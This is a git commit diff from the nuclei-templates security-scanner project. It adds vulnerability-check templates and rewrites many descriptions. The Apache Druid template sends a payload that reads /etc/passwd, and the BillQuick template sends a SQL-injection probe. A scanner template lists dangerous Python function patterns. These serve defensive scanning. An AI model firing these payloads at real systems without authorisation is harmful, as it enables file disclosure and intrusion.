Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CNVD-2019-06255

2021-10-26 17:23:01 +05:30 · 2021-10-26 17:23:01 +05:30 · 50d1f3753d
parent ca66969963 dbe3b11574
commit 50d1f3753d
19 changed files with 143 additions and 14 deletions
--- a/.github/workflows/template-validate.yml
+++ b/.github/workflows/template-validate.yml
@ -20,10 +20,8 @@ jobs:

      - name: Installing Nuclei
        # if: steps.cache-go.outputs.cache-hit != 'true'
-        env:
-          GO111MODULE: on
        run: |
-          go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
+          go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
        shell: bash

      - name: Template Validation
--- a/README.md
+++ b/README.md
@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
 | wp-plugin |   178 | princechaddha |    66 | default-logins   |    60 |          |       |         |       |
 | cve2020   |   166 | madrobot      |    63 | file             |    50 |          |       |         |       |

-**176 directories, 2418 files**.
+**177 directories, 2443 files**.

 </td>
 </tr>
--- a/cves/2021/CVE-2021-36749.yaml
+++ b/cves/2021/CVE-2021-36749.yaml
@ -0,0 +1,35 @@
+id: CVE-2021-36749
+
+info:
+  name: Apache Druid Authentication Restrictions Bypass
+  author: _0xf4n9x_
+  severity: medium
+  description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-36749
+    - https://www.cvedetails.com/cve/CVE-2021-36749/
+    - https://github.com/BrucessKING/CVE-2021-36749
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 6.5
+    cve-id: CVE-2021-36749
+    cwe-id: CWE-668
+  tags: cve,cve2021,apache,lfi,auth-bypass
+
+requests:
+  - raw:
+      - |
+        POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+          - "druid:*:1000:1000:"
+        condition: or
--- a/cves/2021/CVE-2021-42258.yaml
+++ b/cves/2021/CVE-2021-42258.yaml
@ -0,0 +1,64 @@
+id: CVE-2021-42258
+
+info:
+  name: BillQuick Web Suite SQLi
+  author: dwisiswant0
+  severity: high
+  tags: cve,cve2021,sqli,billquick
+  description: |
+    BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
+    allows SQL injection for unauthenticated remote code execution,
+    as exploited in the wild in October 2021 for ransomware installation.
+    SQL injection can, for example, use the txtID (aka username) parameter.
+    Successful exploitation can include the ability to execute
+    arbitrary code as MSSQLSERVER$ via xp_cmdshell.
+  reference:
+    - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-42258
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Referer: {{BaseURL}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
+
+    cookie-reuse: true
+    extractors:
+      - type: xpath
+        name: VS
+        internal: true
+        attribute: value
+        xpath:
+          - "/html/body/form/div/input[@id='__VIEWSTATE']"
+
+      - type: xpath
+        name: VSG
+        internal: true
+        attribute: value
+        xpath:
+          - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
+
+      - type: xpath
+        name: EV
+        internal: true
+        attribute: value
+        xpath:
+          - "/html/body/form/div/input[@id='__EVENTVALIDATION']"
+
+    matchers:
+      - type: word
+        part: body
+        condition: and
+        words:
+          - "System.Data.SqlClient.SqlException"
+          - "Incorrect syntax near"
+          - "_ACCOUNTLOCKED"
--- a/exposed-panels/redis-commander-exposure.yaml
+++ b/exposed-panels/redis-commander-exposure.yaml
@ -0,0 +1,22 @@
+id: redis-commander-exposure
+
+info:
+  name: Redis Commander Exposure
+  author: dahse89
+  severity: low
+  reference:
+    - https://joeferner.github.io/redis-commander/
+    - https://github.com/joeferner/redis-commander
+  tags: panel,redis
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        condition: and
+        words:
+          - "<title>Redis Commander"
+          - "redisCommanderBearerToken"
--- a/file/python/python-scanner.yaml
+++ b/file/python/python-scanner.yaml
@ -4,7 +4,7 @@ info:
  name: Python Scanner
  author: majidmc2
  severity: info
-  description: Scan for dangerous Python functions
+  description: Indicators for dangerous Python functions
  reference:
    - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
    - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
@ -17,7 +17,7 @@ file:

    extractors:
      - type: regex
-        name: Possible Code Injection
+        name: code-injection
        regex:
          - 'exec'
          - 'eval'
@ -25,7 +25,7 @@ file:


      - type: regex
-        name: Possible Command Injection
+        name: command-injection
        regex:
          - 'subprocess.call\(.*shell=True.*\)'
          - 'os.system'
@ -33,18 +33,18 @@ file:


      - type: regex
-        name: Possibly Unpickling untrusted source
+        name: untrusted-source
        regex:
          - 'pickle.loads'
          - 'cPickle.loads'


      - type: regex
-        name: Possibly loading dangerous YAMLs
+        name: dangerous-yaml
        regex:
          - 'yaml.load'

      - type: regex
-        name: Possible SQLi
+        name: sqli
        regex:
-          - 'cursor.execute'
+          - 'cursor.execute'
--- a/vulnerabilities/other/solar-log-authbypass.yaml
+++ b/vulnerabilities/other/solar-log-authbypass.yaml
@ -4,7 +4,7 @@ info:
  name: Solar-Log 500 2.8.2 - Incorrect Access Control
  author: geeknik
  severity: high
-  description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers>
+  description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
  reference: https://www.exploit-db.com/exploits/49986
  tags: solarlog,auth-bypass

--- a/vulnerabilities/other/ueditor-file-upload.yaml
+++ b/vulnerabilities/other/ueditor-file-upload.yaml
@ -3,6 +3,7 @@ info:
  name: UEditor Arbitrary File Upload
  author: princechaddha
  severity: high
+  description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
  reference:
    - https://zhuanlan.zhihu.com/p/85265552
    - https://www.freebuf.com/vuls/181814.html
--- a/vulnerabilities/other/unauth-spark-api.yaml
+++ b/vulnerabilities/other/unauth-spark-api.yaml
@ -3,6 +3,7 @@ info:
  name: Unauthenticated Spark REST API
  author: princechaddha
  severity: medium
+  description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
  reference: https://xz.aliyun.com/t/2490
  tags: spark,unauth

--- a/vulnerabilities/other/viewlinc-crlf-injection.yaml
+++ b/vulnerabilities/other/viewlinc-crlf-injection.yaml
@ -4,6 +4,7 @@ info:
  name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
  author: geeknik
  severity: low
+  description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
  reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
  tags: crlf,viewlinc

--- a/vulnerabilities/other/vpms-auth-bypass.yaml
+++ b/vulnerabilities/other/vpms-auth-bypass.yaml
@ -4,6 +4,7 @@ info:
  name: Vehicle Parking Management System 1.0 - Authentication Bypass
  author: dwisiswant0
  severity: high
+  description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
  reference: https://www.exploit-db.com/exploits/48877
  tags: auth-bypass
 requests:
--- a/vulnerabilities/other/webui-rce.yaml
+++ b/vulnerabilities/other/webui-rce.yaml
@ -3,6 +3,7 @@ info:
  name: WebUI 1.5b6 RCE
  author: pikpikcu
  severity: critical
+  description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
  reference: https://www.exploit-db.com/exploits/36821
  tags: webui,rce

--- a/vulnerabilities/other/wems-manager-xss.yaml
+++ b/vulnerabilities/other/wems-manager-xss.yaml
@ -5,7 +5,7 @@ info:
  author: pikpikcu
  severity: medium
  tags: xss
-
+  description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
  reference:
    - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html

--- a/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
+++ b/vulnerabilities/wordpress/easy-wp-smtp-listing.yaml
@ -4,6 +4,7 @@ info:
  name: SMTP WP Plugin Directory listing enabled
  author: PR3R00T
  severity: high
+  description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
  reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
  tags: wordpress,wp-plugin

--- a/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
+++ b/vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
@ -4,6 +4,7 @@ info:
  name: WordPress Attitude Themes 1.1.1 Open Redirection
  author: 0x_Akoko
  severity: low
+  description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
  reference: https://cxsecurity.com/issue/WLB-2020030183
  tags: wordpress,wp-theme,redirect

--- a/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
+++ b/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
@ -4,6 +4,7 @@ info:
  name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
  author: 0x_Akoko
  severity: low
+  description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
  reference: https://cxsecurity.com/issue/WLB-2020040103
  tags: wordpress,wp-plugin,redirect

--- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
+++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
@ -3,6 +3,7 @@ info:
  name: WordPress accessible wp-config
  author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
  severity: high
+  description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
  tags: wordpress,backup

 requests:
--- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
@ -4,6 +4,7 @@ info:
  name: WordPress Oxygen-Theme Themes LFI
  author: 0x_Akoko
  severity: high
+  description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
  tags: wordpress,wp-theme,lfi
  reference: https://cxsecurity.com/issue/WLB-2019030178

--- a/vulnerabilities/wordpress/wp-upload-data.yaml
+++ b/vulnerabilities/wordpress/wp-upload-data.yaml
@ -4,7 +4,7 @@ info:
  name: wordpress-upload-data
  author: pussycat0x
  severity: medium
-  description: Searches for Passwords  in the wordpress uploads directory.
+  description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
  reference: https://www.exploit-db.com/ghdb/7040
  tags: wordpress,listing